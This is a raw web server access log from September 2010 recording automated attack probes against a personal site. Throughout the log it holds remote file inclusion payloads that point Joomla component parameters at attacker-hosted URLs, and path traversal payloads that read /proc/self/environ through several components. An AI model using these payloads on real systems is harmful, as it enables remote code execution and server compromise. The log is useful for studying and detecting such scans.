222.236.47.182 - - [02/Sep/2010:12:09:34 -0700] "GET /logs/access_081027.log%20%20//e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:09:47 -0700] "GET /logs/access_080810.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:09:50 -0700] "POST /logs/access_091225.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:09:51 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:09:55 -0700] "POST /logs/access_081230.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:09:58 -0700] "GET /logs/access_091224.log%20%20//e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:09:58 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:10:36 -0700] "GET /megumi/minamigrad2k8/IMG_1599.CR2 HTTP/1.0" 200 10063424 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:10:50 -0700] "GET /logs/access_081027.log%20%20//e404.php?INCLUDE_FOLDER=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:10:58 -0700] "GET /logs/access_081027.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:11:01 -0700] "GET /logs/access_100110.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:11:24 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:11:24 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:11:24 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:11:24 -0700] "GET /logs/access_080820.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.105.210.172 - - [02/Sep/2010:12:11:39 -0700] "GET /logs/access_080912.log HTTP/1.0" 200 1638400 "http://www.dmulk.com/logs/access_080912.log" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:11:48 -0700] "GET /logs/access_100601.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:11:59 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:12:04 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "Mozilla/5.0" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:12:04 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "libwww-perl/5.831" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:12:06 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "" "dmulk.com"
74.55.250.50 - - [02/Sep/2010:12:12:07 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "" "dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:12:35 -0700] "GET /logs/access_100726.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:12:37 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:12:38 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:12:46 -0700] "GET /logs/access_100726.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:12:47 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:12:48 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:12:55 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:12:56 -0700] "GET /logs/access_080907.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:12:56 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:04 -0700] "GET /logs/access_080827.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:04 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:05 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:13:07 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:13:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:13:16 -0700] "POST /logs/access_081218.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:27 -0700] "GET /logs/access_080622.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:34 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:34 -0700] "GET /logs/access_091208.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:34 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:36 -0700] "GET /logs/access_081026.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.201.66.60 - - [02/Sep/2010:12:13:38 -0700] "GET /logs/access_081122.log HTTP/1.1" 200 4258638 "http://www.dmulk.com/logs/access_081122.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:48 -0700] "GET /logs/access_091017.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:48 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:13:50 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:53 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:53 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:53 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:54 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:54 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:54 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:54 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:54 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:55 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "Mozilla/5.0" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:56 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "libwww-perl/5.833" "dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:58 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "" "dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:13:58 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:13:58 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.123.133.130 - - [02/Sep/2010:12:13:58 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 68568 "-" "" "dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:13:58 -0700] "GET /logs/access_080820.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.206.58.218 - - [02/Sep/2010:12:14:01 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://getemgirlfriday.com/news//list/idshiro1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:16 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "Mozilla/5.0" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:17 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "libwww-perl/5.831" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:18 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 68484 "-" "" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:19 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68603 "-" "" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:19 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "dmulk.com"
174.123.161.226 - - [02/Sep/2010:12:14:19 -0700] "GET /logs/access.log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "dmulk.com"
219.240.36.36 - - [02/Sep/2010:12:14:35 -0700] "POST /logs/access_090322.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
219.240.36.36 - - [02/Sep/2010:12:14:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
219.240.36.36 - - [02/Sep/2010:12:14:38 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:14:48 -0700] "GET /logs/access_100820.log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:14:53 -0700] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68481 "-" "libwww-perl/5.76" "www.dmulk.com"
62.40.145.110 - - [02/Sep/2010:12:14:54 -0700] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:12:14:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:17:00 -0700] "GET /logs/access_081001.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:17:11 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:17:11 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:17:17 -0700] "GET /logs/access_080602.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:17:26 -0700] "GET /logs/access_080709.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:17:29 -0700] "GET /logs/access_090425.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:17:43 -0700] "POST /logs/access_100611.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:17:43 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:17:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:17:59 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:18:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:12:18:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:12:18:27 -0700] "POST /logs/access_081025.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:12:18:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:12:18:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:12:18:48 -0700] "POST /logs/access_091104.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:12:18:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
64.91.254.83 - - [02/Sep/2010:12:18:58 -0700] "GET /logs/access_080810.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
219.240.36.36 - - [02/Sep/2010:12:19:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
219.240.36.36 - - [02/Sep/2010:12:19:00 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
219.240.36.36 - - [02/Sep/2010:12:19:00 -0700] "POST /logs/access_090322.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:12:21:00 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
196.28.226.33 - - [02/Sep/2010:12:21:00 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:21:04 -0700] "POST /logs/access_090322.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:21:04 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:21:54 -0700] "POST /logs/access_090320.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:22:18 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:22:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:22:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:22:46 -0700] "GET /logs/access_090220.log HTTP/1.0" 200 3425495 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:24:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:24:09 -0700] "POST /logs/access_090322.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:24:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
80.72.93.190 - - [02/Sep/2010:12:24:35 -0700] "GET /logs/access_081114.log//index.php?option=com_exposeprive&itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.72.93.190 - - [02/Sep/2010:12:24:40 -0700] "GET /index.php?option=com_exposeprive&itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
80.72.93.190 - - [02/Sep/2010:12:24:41 -0700] "GET /logs//index.php?option=com_exposeprive&itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.72.93.190 - - [02/Sep/2010:12:24:50 -0700] "GET /index.php?option=com_exposeprive&itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68480 "-" "libwww-perl/5.813" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:25:15 -0700] "GET /bikes/dteel/?M=A HTTP/1.0" 200 5510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
